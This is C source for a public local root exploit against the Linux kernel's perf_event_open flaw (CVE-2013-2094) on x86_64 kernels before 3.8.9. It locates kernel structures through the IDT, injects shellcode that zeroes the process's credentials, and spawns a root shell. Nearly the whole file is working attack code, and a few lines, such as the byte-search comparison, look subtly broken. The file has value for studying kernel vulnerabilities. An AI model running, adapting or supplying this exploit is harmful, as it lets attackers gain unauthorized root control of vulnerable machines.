** CVE-2013-2094 exploit x86_64 Linux < 3.8.9* by sorbo (sorbo@darkircop.org) June 2013** Based on sd‘s exploit.  Supports more targets.**/#define _GNU_SOURCE#include <string.h>#include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <stdint.h>#include <sys/syscall.h>#include <sys/mman.h>#include <linux/perf_event.h>#include <signal.h>#include <assert.h>#define BASE        0x380000000#define BASE_JUMP   0x1780000000#define SIZE        0x10000000#define KSIZE       0x2000000#define TMP(x) (0xdeadbeef + (x))struct idt {    uint16_t limit;    uint64_t addr;} __attribute__((packed));static int _fd;static int perf_open(uint64_t off){    struct perf_event_attr attr;    int rc;//  printf("perf open %lx [%d]\n", off, (int) off);    memset(&attr, 0, sizeof(attr));    attr.type           = PERF_TYPE_SOFTWARE;    attr.size           = sizeof(attr);    attr.config         = off;    attr.mmap           = 1;    attr.comm           = 1;    attr.exclude_kernel = 1;    rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);    return rc;}void __sc_start(void);void __sc_next(void);void __sc(void){    asm("__sc_start:\n"        "call __sc_next\n"        "iretq\n"        "__sc_next:\n");}void sc(void){    int i, j;    uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));    uint64_t kbase = ((uint64_t)current) >> 36;    int uid = TMP(1);    int gid = TMP(2);    for (i = 0; i < 4000; i += 4) {        uint64_t *p = (void *) &current[i];        uint32_t *cred = (uint32_t*) p[0];        if ((p[0] != p[1]) || ((p[0]>>36) != kbase))            continue;        for (j = 0; j < 20; j++) {            if (cred[j] == uid && cred[j + 1] == gid) {                for (i = 0; i < 8; i++) {                    cred[j + i] = 0;                    return;                }            }        }    }}static void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val){    void *p;    p = memmem(sc, 900, &needle, sizeof(needle));    if (!p)        errx(1, "can‘t find %x", needle);    memcpy(p, &val, sizeof(val));}static void *map_mem(uint64_t addr){    void *p;    p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,         MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);    if (p == MAP_FAILED)        err(1, "mmap()");    return p;}static int find_mem(void *mem, uint8_t c){    int i;    uint8_t *p = mem;    for (i = 0; i < SIZE; i++) {        if (p == c)            return i;    }    return -1;}static void dropshell(){    if (setuid(0) != 0)        errx(1, "failed");    printf("Launching shell\n");    execl("/bin/sh", "sh", NULL);    exit(0);}void morte(int x){    printf("Got signal\n");    close(_fd);    dropshell();}static void trigger(int intr){    switch (intr) {    case 0:        do {            int z = 1;            int a = 1;            z--;            a /= z;        } while (0);        break;    case 4:        asm("int $4");        break;    case 0x80:        asm("int $0x80");        break;    default:        errx(1, "unknown intr %d", intr);    }    sleep(3);}int main(int argc, char *argv[]){    uint32_t *p[2];    int fd, i;    uint64_t off;    uint64_t addr = BASE;    struct idt idt;    uint8_t *kbase;    int sz = 4;    int intr = 4;    printf("Searchin...\n");    p[0] = map_mem(BASE);    p[1] = map_mem(BASE_JUMP);    memset(p[1], 0x69, SIZE);    off = 0xFFFFFFFFL;    fd = perf_open(off);    close(fd);    i = find_mem(p[0], 0xff);    if (i == -1) {        i = find_mem(p[1], 0x68);        if (i == -1)            errx(1, "Can‘t find overwrite");        sz = 24;        addr = BASE_JUMP;        printf("detected CONFIG_JUMP_LABEL\n");    }    munmap(p[0], SIZE);    munmap(p[1], SIZE);    addr += i;    addr -= off * sz;    printf("perf_swevent_enabled is at 0x%lx\n", addr);    asm("sidt %0" : "=m" (idt));    printf("IDT at 0x%lx\n", idt.addr);    off = addr - idt.addr;    off -= 8;    switch (off % sz) {    case 0:        intr = 0;        break;    case 8:        intr = 0x80;        break;    case 16:        intr = 4;        break;    default:        errx(1, "remainder %d", off % sz);    }    printf("Using interrupt %d\n", intr);    off -= 16 * intr;    assert((off % sz) == 0);    off /= sz;    off = -off;//  printf("Offset %lx\n", off);    kbase = (uint8_t*) (idt.addr & 0xFF000000);    printf("Shellcode at %p\n", kbase);    if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,         MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)        err(1, "mmap()");    memset(kbase, 0x90, KSIZE);    kbase += KSIZE - 1024;    i = __sc_next - __sc_start;    memcpy(kbase, __sc_start, i);    kbase += i;    memcpy(kbase, sc, 900);    sc_replace(kbase, TMP(1), getuid());    sc_replace(kbase, TMP(2), getgid());    signal(SIGALRM, morte);    alarm(2);    printf("Triggering sploit\n");    _fd = perf_open(off);    trigger(intr);    exit(0);}